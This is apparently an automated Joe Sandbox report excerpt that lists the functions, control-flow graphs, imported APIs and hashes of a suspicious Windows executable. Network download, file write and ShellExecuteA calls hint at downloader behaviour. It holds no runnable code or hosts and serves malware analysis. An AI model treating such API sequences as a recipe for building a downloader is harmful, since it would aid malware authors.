                                  • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6ACE848E0
                                  • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6ACE84907
                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF6ACE84952
                                    • Part of subcall function 00007FF6ACE851B0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF6ACE851DD
                                    • Part of subcall function 00007FF6ACE851B0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF6ACE851F7
                                    • Part of subcall function 00007FF6ACE851B0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF6ACE85229
                                    • Part of subcall function 00007FF6ACE851B0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF6ACE85254
                                    • Part of subcall function 00007FF6ACE851B0: std::_Facet_Register.LIBCPMT ref: 00007FF6ACE8526D
                                    • Part of subcall function 00007FF6ACE851B0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF6ACE8528C
                                  • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6ACE84967
                                  • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF6ACE8497E
                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6ACE849C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                  • String ID:
                                  • API String ID: 3067465659-0
                                  • Opcode ID: a896ab53d942e48a7b7ee0c355a5a6979400eb9bfc4d2169f42b6be63e015f7e
                                  • Instruction ID: 25b870290b76d06c82dba0db7e58d1e786d05913d809097a411f12c88fbb89b1
                                  • Opcode Fuzzy Hash: a896ab53d942e48a7b7ee0c355a5a6979400eb9bfc4d2169f42b6be63e015f7e
                                  • Instruction Fuzzy Hash: 7151283270AB86C6EB50CF25E890A6977A4FB89F88F145035DA8E93B68DF3CD455C740
                                  Function 00007FF6ACE84C30 Relevance: 13.6, APIs: 9, Instructions: 136COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 417 7ff6ace84c30-7ff6ace84c59 418 7ff6ace84c60-7ff6ace84c67 417->418 418->418 419 7ff6ace84c69-7ff6ace84c78 418->419 420 7ff6ace84c7a-7ff6ace84c7d 419->420 421 7ff6ace84c84 419->421 420->421 422 7ff6ace84c7f-7ff6ace84c82 420->422 423 7ff6ace84c86-7ff6ace84c96 421->423 422->423 424 7ff6ace84c98-7ff6ace84c9e 423->424 425 7ff6ace84c9f-7ff6ace84cb1 ?good@ios_base@std@@QEBA_NXZ 423->425 424->425 426 7ff6ace84ce3-7ff6ace84ce9 425->426 427 7ff6ace84cb3-7ff6ace84cc2 425->427 431 7ff6ace84ceb-7ff6ace84cf0 426->431 432 7ff6ace84cf5-7ff6ace84d08 426->432 429 7ff6ace84cc4-7ff6ace84cc7 427->429 430 7ff6ace84ce1 427->430 429->430 436 7ff6ace84cc9-7ff6ace84cdf ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 429->436 430->426 433 7ff6ace84dad-7ff6ace84dcb ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 431->433 434 7ff6ace84d3d-7ff6ace84d58 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 432->434 435 7ff6ace84d0a 432->435 440 7ff6ace84dcd-7ff6ace84dd6 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 433->440 441 7ff6ace84dd7-7ff6ace84de7 433->441 438 7ff6ace84d5a 434->438 439 7ff6ace84d86 434->439 437 7ff6ace84d10-7ff6ace84d13 435->437 436->426 437->434 444 7ff6ace84d15-7ff6ace84d2f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 437->444 445 7ff6ace84d60-7ff6ace84d63 438->445 446 7ff6ace84d89 439->446 440->441 442 7ff6ace84de9-7ff6ace84def 441->442 443 7ff6ace84df0-7ff6ace84e04 441->443 442->443 447 7ff6ace84d38-7ff6ace84d3b 444->447 448 7ff6ace84d31-7ff6ace84d36 444->448 449 7ff6ace84d8d-7ff6ace84d9d 445->449 450 7ff6ace84d65-7ff6ace84d7f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 445->450 446->449 447->437 448->446 449->433 450->439 452 7ff6ace84d81-7ff6ace84d84 450->452 452->445
                                  APIs
                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84CA9
                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84CC9
                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84CD9
                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84D26
                                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84D4F
                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84D76
                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84DBC
                                  • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84DC3
                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,00000050,00000000,00007FF6ACE818D7), ref: 00007FF6ACE84DD0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                  • String ID:
                                  • API String ID: 3274656010-0
                                  • Opcode ID: 248ade77838373edbcb826c054ec37edfb1687002e581ce2532d7bf4c6c7cef9
                                  • Instruction ID: 43d9187267e2e32bffc0b32b1578c789cde3e2252bbbe4989a7c6c25ca4ac481
                                  • Opcode Fuzzy Hash: 248ade77838373edbcb826c054ec37edfb1687002e581ce2532d7bf4c6c7cef9
                                  • Instruction Fuzzy Hash: 32512F3270AA4181EB218F29E5A0638BBA0FF85F95F15C531DE5EA7BE1CF39D4468300
                                  Function 00007FF6ACE84A60 Relevance: 13.6, APIs: 9, Instructions: 132COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 453 7ff6ace84a60-7ff6ace84a9a 454 7ff6ace84a9c-7ff6ace84aa2 453->454 455 7ff6ace84aa3-7ff6ace84ab5 ?good@ios_base@std@@QEBA_NXZ 453->455 454->455 456 7ff6ace84ae7-7ff6ace84aed 455->456 457 7ff6ace84ab7-7ff6ace84ac6 455->457 460 7ff6ace84af3-7ff6ace84b19 456->460 461 7ff6ace84bc2-7ff6ace84bf0 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 456->461 458 7ff6ace84ac8-7ff6ace84acb 457->458 459 7ff6ace84ae5 457->459 458->459 463 7ff6ace84acd-7ff6ace84ae3 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 458->463 459->456 464 7ff6ace84b1b 460->464 465 7ff6ace84b59-7ff6ace84b74 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 460->465 466 7ff6ace84bfc-7ff6ace84c0b 461->466 467 7ff6ace84bf2-7ff6ace84bfb ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 461->467 463->456 468 7ff6ace84b20-7ff6ace84b25 464->468 471 7ff6ace84b77-7ff6ace84b7b 465->471 469 7ff6ace84c0d-7ff6ace84c13 466->469 470 7ff6ace84c14-7ff6ace84c28 466->470 467->466 472 7ff6ace84b27-7ff6ace84b2a 468->472 473 7ff6ace84b80-7ff6ace84b85 468->473 469->470 471->473 474 7ff6ace84b2c-7ff6ace84b54 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 472->474 475 7ff6ace84b56 472->475 477 7ff6ace84b87-7ff6ace84b8a 473->477 478 7ff6ace84bb2 473->478 474->468 475->465 477->478 479 7ff6ace84b8c-7ff6ace84bb0 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 477->479 478->461 479->471
                                  APIs
                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6ACE84AAD
                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6ACE84ACD
                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6ACE84ADD
                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6ACE84B3D
                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6ACE84B66
                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6ACE84B9D
                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6ACE84BE1
                                  • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6ACE84BE8
                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6ACE84BF5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?good@ios_base@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                  • String ID:
                                  • API String ID: 834659371-0
                                  • Opcode ID: 561e18636be18f5fa873beace75a1f4876f4b4da61f6f470508deed2b5f2db9c
                                  • Instruction ID: 132a48e191917e098621697fa90eda11c56747212dd3158e1352cbe884cbd473
                                  • Opcode Fuzzy Hash: 561e18636be18f5fa873beace75a1f4876f4b4da61f6f470508deed2b5f2db9c
                                  • Instruction Fuzzy Hash: 0951623660AA8186DB108F69D5E0639B7A0FB84F95B158532DF6E977A0CF38D456C700
                                  Function 00007FF6ACE856E0 Relevance: 13.6, APIs: 9, Instructions: 131COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 480 7ff6ace856e0-7ff6ace85714 481 7ff6ace85716-7ff6ace85719 480->481 482 7ff6ace85720 480->482 481->482 483 7ff6ace8571b-7ff6ace8571e 481->483 484 7ff6ace85722-7ff6ace85732 482->484 483->484 485 7ff6ace8573b-7ff6ace8574d ?good@ios_base@std@@QEBA_NXZ 484->485 486 7ff6ace85734-7ff6ace8573a 484->486 487 7ff6ace8577f-7ff6ace85785 485->487 488 7ff6ace8574f-7ff6ace8575e 485->488 486->485 491 7ff6ace85787-7ff6ace8578c 487->491 492 7ff6ace85791-7ff6ace857a4 487->492 489 7ff6ace8577d 488->489 490 7ff6ace85760-7ff6ace85763 488->490 489->487 490->489 494 7ff6ace85765-7ff6ace8577b ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 490->494 495 7ff6ace85841-7ff6ace8585f ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exception@std@@YA_NXZ 491->495 496 7ff6ace857d7-7ff6ace857f2 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 492->496 497 7ff6ace857a6-7ff6ace857a9 492->497 494->487 498 7ff6ace8586b-7ff6ace8587a 495->498 499 7ff6ace85861-7ff6ace8586a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 495->499 501 7ff6ace8581a-7ff6ace8581d 496->501 502 7ff6ace857f4-7ff6ace857f7 496->502 497->496 500 7ff6ace857ab-7ff6ace857c5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 497->500 506 7ff6ace8587c-7ff6ace85882 498->506 507 7ff6ace85883-7ff6ace85897 498->507 499->498 504 7ff6ace857c7-7ff6ace857d0 500->504 505 7ff6ace857d2-7ff6ace857d5 500->505 503 7ff6ace85821-7ff6ace85831 501->503 502->503 508 7ff6ace857f9-7ff6ace85813 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 502->508 503->495 504->502 505->497 506->507 508->501 509 7ff6ace85815-7ff6ace85818 508->509 509->502
                                  APIs
                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6ACE85745
                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6ACE85765
                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF6ACE85775
                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6ACE857BC
                                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF6ACE857E9
                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF6ACE8580A
                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6ACE85850
                                  • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF6ACE85857
                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF6ACE85864
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                  • String ID:
                                  • API String ID: 3274656010-0
                                  • Opcode ID: ac6aa3f5fb1cc28d679886165e4b21ea4774332ddcffcc08a88d8eb228989689
                                  • Instruction ID: ec2d79e540280da5e81eb740a884b9b3d32b5341b795512d63ad9d903e20d35f
                                  • Opcode Fuzzy Hash: ac6aa3f5fb1cc28d679886165e4b21ea4774332ddcffcc08a88d8eb228989689
                                  • Instruction Fuzzy Hash: 8E51F03660AA41C2FF21CF19E590A38B7A0FB85F95B55C532DE5E97B60CE3ED4468700
                                  Function 00007FF6ACE820D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameA.KERNEL32 ref: 00007FF6ACE82106
                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6ACE82121
                                  • memset.VCRUNTIME140 ref: 00007FF6ACE8213C
                                  • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z.MSVCP140 ref: 00007FF6ACE82198
                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6ACE821C6
                                  • ShellExecuteA.SHELL32 ref: 00007FF6ACE821F0
                                    • Part of subcall function 00007FF6ACE82230: ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6ACE822C6
                                    • Part of subcall function 00007FF6ACE82230: ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6ACE822D4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ostream@??1?$basic_streambuf@?setstate@?$basic_ios@?write@?$basic_ostream@ExecuteFileModuleNameShellV12@_stricmpmemset
                                  • String ID: open
                                  • API String ID: 4130260198-2758837156
                                  • Opcode ID: 22c02f708d27c3b1d81104b44673461b48dbf1e0b9927b7cb8526d95fb35ad8d
                                  • Instruction ID: 0c4c88bfa0eed6124a3d89fa2339cc834042aa28817b5aee788ef4174acda5e4
                                  • Opcode Fuzzy Hash: 22c02f708d27c3b1d81104b44673461b48dbf1e0b9927b7cb8526d95fb35ad8d
                                  • Instruction Fuzzy Hash: 7C319A32729A81C1EB60DB25E895BBA73A0FF94B84F405035EA4DD7A65DF3CD544CB00
                                  Function 00007FF6ACE85D1C Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                  • String ID:
                                  • API String ID: 1133592946-0
                                  • Opcode ID: 5cdba4028779adf41efbfd226bfda1fc25b860f6cb45ac053feb1286a5d420fa
                                  • Instruction ID: 78409bc12c1e39a759b8764cd15bfd6e614e6d6e1a53f5d85a0cdaee548807f1
                                  • Opcode Fuzzy Hash: 5cdba4028779adf41efbfd226bfda1fc25b860f6cb45ac053feb1286a5d420fa
                                  • Instruction Fuzzy Hash: 7E315935A0F64382FE50AF209952BBA3795BF85784F845435EA4DFB2E7DE2CE8048351
                                  Function 00007FF6ACE82714 Relevance: 12.1, APIs: 8, Instructions: 74networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Internet$CloseHandle$FileHttpInfoOpenQueryRead_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 3965888079-0
                                  • Opcode ID: a5dd6928269e48a371b23345750f5c6f4ff3848709d6d17988038cc71ebbb807
                                  • Instruction ID: b85da0db65faa851ff02644c790347b6442262d0da7ac76ad8f6734a482806e7
                                  • Opcode Fuzzy Hash: a5dd6928269e48a371b23345750f5c6f4ff3848709d6d17988038cc71ebbb807
                                  • Instruction Fuzzy Hash: 1C313A72B0A7C28AEB709F219844BA83391FB55BD4F400135E92EAAB98DF3CE544D700
                                  Function 00007FF6ACE822F0 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_taskSleep$?always_noconv@codecvt_base@std@@Query_perf_counterQuery_perf_frequency_invalid_parameter_noinfo_noreturnmallocmemset
                                  • String ID:
                                  • API String ID: 1722148790-0
                                  • Opcode ID: b45bc71eda5227c746e0789d304113b5042f72e7edf32d9e3541c290b724b804
                                  • Instruction ID: 54ca9bbb2781de8159b8c46687b3e54d3850ca03ea44fa0bef4aa71fc408b7e8
                                  • Opcode Fuzzy Hash: b45bc71eda5227c746e0789d304113b5042f72e7edf32d9e3541c290b724b804
                                  • Instruction Fuzzy Hash: 3AA16636606FC58DDBB08F65EC807DD32A4F708B98F508526DA9DABB59DF34C2958340
                                  Function 00007FF6ACE84E10 Relevance: 6.1, APIs: 4, Instructions: 92sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Query_perf_counterQuery_perf_frequencySleep
                                  • String ID:
                                  • API String ID: 2072706261-0
                                  • Opcode ID: c3a718402a3889e90bc4ed292276ae6978282ec1decbbe50749ddf36e5327fb1
                                  • Instruction ID: b40f8641d16f2949365e5fa76288e8a38a861f81fb1a42c70578a96b200126fa
                                  • Opcode Fuzzy Hash: c3a718402a3889e90bc4ed292276ae6978282ec1decbbe50749ddf36e5327fb1
                                  • Instruction Fuzzy Hash: 5B315A61B0778A41EE08CB69B566579A395FB84BD0F48A136DE1F6B7D2FD3CE0424300
                                  Function 00007FF6ACE85AF8 Relevance: 4.5, APIs: 3, Instructions: 21COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6ACE813B3), ref: 00007FF6ACE85B12
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6ACE85B28
                                    • Part of subcall function 00007FF6ACE86294: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6ACE8629D
                                    • Part of subcall function 00007FF6ACE86294: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF6ACE85B2D,?,?,?,00007FF6ACE813B3), ref: 00007FF6ACE862AE
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6ACE85B2E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
